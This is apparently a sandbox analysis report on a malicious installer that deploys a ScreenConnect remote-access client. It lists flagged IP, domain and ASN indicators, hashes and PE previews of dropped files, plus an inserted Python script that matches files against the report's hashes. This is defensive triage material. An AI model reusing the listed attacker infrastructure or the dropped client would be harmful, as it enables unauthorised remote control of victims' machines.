• VT rate limit hit for: f53WqfzzNt.exe
                                                                                                              No simulations
Context by IP:
Match | Associated Sample Name / URL | Detection | Threat Name | Context
38.69.12.167 | tiG6Ep202n.exe | malicious | ScreenConnect Tool |
38.69.12.167 | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool |
38.69.12.167 | tiG6Ep202n.exe | malicious | ScreenConnect Tool |
38.69.12.167 | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool |
38.69.12.167 | hB52OUUCE2.exe | malicious | ScreenConnect Tool |
38.69.12.167 | lCwus2wfk6.exe | malicious | ScreenConnect Tool |
38.69.12.167 | pbenHWj8JO.exe | malicious | ScreenConnect Tool |
38.69.12.167 | 1g6DULljd2.exe | malicious | ScreenConnect Tool |
38.69.12.167 | 2nmtr41l0S.exe | malicious | ScreenConnect Tool |

Context by domain:
Match | Associated Sample Name / URL | Detection | Threat Name | Context
sc.connectprotocol.es | tiG6Ep202n.exe | malicious | ScreenConnect Tool | 38.69.12.167
sc.connectprotocol.es | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool | 38.69.12.167
sc.connectprotocol.es | tiG6Ep202n.exe | malicious | ScreenConnect Tool | 38.69.12.167
sc.connectprotocol.es | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool | 38.69.12.167
sc.connectprotocol.es | hB52OUUCE2.exe | malicious | ScreenConnect Tool | 38.69.12.167
sc.connectprotocol.es | lCwus2wfk6.exe | malicious | ScreenConnect Tool | 38.69.12.167
sc.connectprotocol.es | pbenHWj8JO.exe | malicious | ScreenConnect Tool | 38.69.12.167
sc.connectprotocol.es | 1g6DULljd2.exe | malicious | ScreenConnect Tool | 38.69.12.167
sc.connectprotocol.es | 2nmtr41l0S.exe | malicious | ScreenConnect Tool | 38.69.12.167

Context by ASN:
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54583US | tiG6Ep202n.exe | malicious | ScreenConnect Tool | 38.69.12.167
54583US | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool | 38.69.12.167
54583US | tiG6Ep202n.exe | malicious | ScreenConnect Tool | 38.69.12.167
54583US | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool | 38.69.12.167
54583US | hB52OUUCE2.exe | malicious | ScreenConnect Tool | 38.69.12.167
54583US | lCwus2wfk6.exe | malicious | ScreenConnect Tool | 38.69.12.167
54583US | pbenHWj8JO.exe | malicious | ScreenConnect Tool | 38.69.12.167
54583US | 1g6DULljd2.exe | malicious | ScreenConnect Tool | 38.69.12.167
54583US | 2nmtr41l0S.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                                                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | tiG6Ep202n.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | tiG6Ep202n.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | hB52OUUCE2.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | lCwus2wfk6.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | pbenHWj8JO.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | VVs9SAqm5N.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | 1g6DULljd2.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | tiG6Ep202n.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | tiG6Ep202n.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | hB52OUUCE2.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | lCwus2wfk6.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | pbenHWj8JO.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | VVs9SAqm5N.exe | malicious | ScreenConnect Tool
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | 1g6DULljd2.exe | malicious | ScreenConnect Tool

Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):219559
                                                                                                                                                                    Entropy (8bit):6.582340024712406
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:EW9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGW:EWuH2aCGw1ST1wQLdqvW
                                                                                                                                                                    MD5:EE0CAA10D824D53BF05C55219F06F351
                                                                                                                                                                    SHA1:00750DFF09CA2BFFE85AABA2EE71EDE909553713
                                                                                                                                                                    SHA-256:67DB5C077B813AE0419AFF16CA89F3899260970E73794974CEE9DF2B16CCC0E7
                                                                                                                                                                    SHA-512:4BF8E1DFD65AB94DE6FAC5C86A0386FE4B629F523C4A22A50AC480BAA84C2745D103486FB5F808A63E0860C370E8D70B7A1C9661B8F8CF04B48A9A1496A45191
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\4ec960.rbs, Author: Joe Security
                                                                                                                                                                    Preview:...@IXOS.@.....@.R.Y.@.....@.....@.....@.....@.....@......&.{14C6E684-39F9-9C17-EDF7-878C827CA860}'.ScreenConnect Client (a532d472f1ff1d4e)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a532d472f1ff1d4e)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{CF9AE42D-A542-A5BE-DF54-2B1FF488B5E3}&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.@......&.{9509AE8A-E997-4132-8CAB-BAFE89DF77F6}&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.@......&.{8B377FBF-DB9A-CC34-86C5-7376F38045E2}&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.@......&.{323CD391-BE8F-8C69-EEBD-0C2E11594F31}&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.@......&.{992F76AD-4404-BDC8-9819-6B28811D5620}&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.@......&.{63515BD8-20DD-F293-D546-00656A7D96D3}&.{14C6E684-39F9-9C17-EDF7

Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):444
                                                                                                                                                                    Entropy (8bit):4.5254339848602845
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:rHy2DLI4MWo9E5SL9cAIUPDLk6N7A7K3UMZRCl1jBlka:zHE4bSBxIU7TE7KtZRKBlka
                                                                                                                                                                    MD5:9B38D6900AA7DEA328BAEC4CA308737F
                                                                                                                                                                    SHA1:93960A7381926A250F5B2A800A2FB89E0A188BE7
                                                                                                                                                                    SHA-256:9D67E0E35D8DAD9B0AE368E607E134B755C3EB4BE2CE0A65578FEAE78116C794
                                                                                                                                                                    SHA-512:0DA66F8595ACEDF8465FFE9F825A5CA39E888F8C66AC17D83D091BB6D292352A3357BA09897CDF52439F61C1F2FDC0FB207E065C8D57928307DFB537D337321E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP=c!.@To..2...n_\.......%........... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....>H.i.d.d.e.n.A.p.p.B.a.l.l.o.o.n.T.e.x.t.T.i.t.l.e.F.o.r.m.a.t.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.......File......

Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):50133
                                                                                                                                                                    Entropy (8bit):4.759054454534641
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                    MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                    SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                    SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                    SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26722
                                                                                                                                                                    Entropy (8bit):7.7401940386372345
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                    MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                    SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                    SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                    SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):197120
                                                                                                                                                                    Entropy (8bit):6.586775768189165
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                                                                                                    MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                                                                                                    SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                                                                                                    SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                                                                                                                    SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: tiG6Ep202n.exe, Detection: malicious
• Filename: 6IqUjK9Koj.exe, Detection: malicious
• Filename: tiG6Ep202n.exe, Detection: malicious
• Filename: 6IqUjK9Koj.exe, Detection: malicious
• Filename: hB52OUUCE2.exe, Detection: malicious
• Filename: lCwus2wfk6.exe, Detection: malicious
• Filename: pbenHWj8JO.exe, Detection: malicious
• Filename: VVs9SAqm5N.exe, Detection: malicious
• Filename: 1g6DULljd2.exe, Detection: malicious
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):68096
                                                                                                                                                                    Entropy (8bit):6.06942231395039
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                                                                                                                    MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                                                                                                    SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                                                                                                    SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                                                                                                    SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: tiG6Ep202n.exe, Detection: malicious
• Filename: 6IqUjK9Koj.exe, Detection: malicious
• Filename: tiG6Ep202n.exe, Detection: malicious
• Filename: 6IqUjK9Koj.exe, Detection: malicious
• Filename: hB52OUUCE2.exe, Detection: malicious
• Filename: lCwus2wfk6.exe, Detection: malicious
• Filename: pbenHWj8JO.exe, Detection: malicious
• Filename: VVs9SAqm5N.exe, Detection: malicious
• Filename: 1g6DULljd2.exe, Detection: malicious
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
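The two .NET DLL entries above give the size, "Entropy (8bit)" and SHA-256 that msiexec drops into the ScreenConnect Client (a532d472f1ff1d4e) directory. The script below is an added example, not part of the Joe Sandbox report or of ScreenConnect, showing how a responder recomputes those three fields from a file's bytes and checks a suspect DLL against the values on this page: Shannon entropy over byte values (the report's 8-bit entropy figure), SHA-256, and a size-plus-hash lookup against the two hashes copied from the entries above. The report does not say which hash belongs to ScreenConnect.Client.dll and which to ScreenConnect.ClientService.dll, so the lookup table leaves them unnamed; the sample buffer at the bottom is constructed, not bytes from the real sample.

```python
import hashlib
import math
from collections import Counter

# SHA-256 (lowercased to match hexdigest()) and size of the two .NET DLLs
# dropped by msiexec, copied from the report entries above. The report does
# not map the hashes to the two DLL file names, so they stay unnamed here.
DROPPED_DLL_IOCS = {
    "ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f": 197120,
    "fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca": 68096,
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the same measure the report
    labels "Entropy (8bit)": 0.0 for a constant buffer, 8.0 for uniformly
    distributed bytes. Values near 8 suggest compression or encryption."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def profile(data: bytes) -> dict:
    """Recompute the fields a report entry lists for a file and check the
    SHA-256 against the IOC table. The size must agree as well, which catches
    a hash copied into the table against the wrong entry."""
    digest = hashlib.sha256(data).hexdigest()
    expected_size = DROPPED_DLL_IOCS.get(digest)
    return {
        "size": len(data),
        "sha256": digest,
        "entropy": round(shannon_entropy(data), 6),
        "ioc_match": expected_size is not None and expected_size == len(data),
    }


def profile_path(path: str) -> dict:
    """Profile a file on disk, e.g. a DLL pulled from the install directory."""
    with open(path, "rb") as fh:
        return profile(fh.read())


if __name__ == "__main__":
    # Constructed stand-in for a dropped file: a DOS-stub-like header followed
    # by low-entropy filler. Not bytes from the real sample.
    sample = (b"MZ" + b"\x00" * 62
              + b"This program cannot be run in DOS mode."
              + b"\x00" * 1000)
    print(profile(sample))
```

Run `profile_path()` against each file in the `ScreenConnect Client (a532d472f1ff1d4e)` directory on a host under investigation; a hit means the DLL is byte-identical to one analysed here, while a miss on a file with the same name only tells you the build differs, since the installer is generated per ScreenConnect instance.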
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):95512
                                                                                                                                                                    Entropy (8bit):6.504684691533346
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                                                                                                                    MD5:75B21D04C69128A7230A0998086B61AA
                                                                                                                                                                    SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                                                                                                                    SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                                                                                                                    SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):548864
                                                                                                                                                                    Entropy (8bit):6.034211651049746
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                                                                                    MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                                                                                    SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                                                                                    SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                                                                                    SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1721856
                                                                                                                                                                    Entropy (8bit):6.639085961200334
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                                                                                    MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                                                                                    SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                                                                                    SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                                                                                    SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):260168
                                                                                                                                                                    Entropy (8bit):6.416438906122177
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                                                                                                    MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                                                                                                    SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                                                                                                    SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                                                                                                    SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):61208
                                                                                                                                                                    Entropy (8bit):6.310126082367387
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                                                                                                                    MD5:AFA97CAF20F3608799E670E9D6253247
                                                                                                                                                                    SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                                                                                                                    SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                                                                                                                    SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
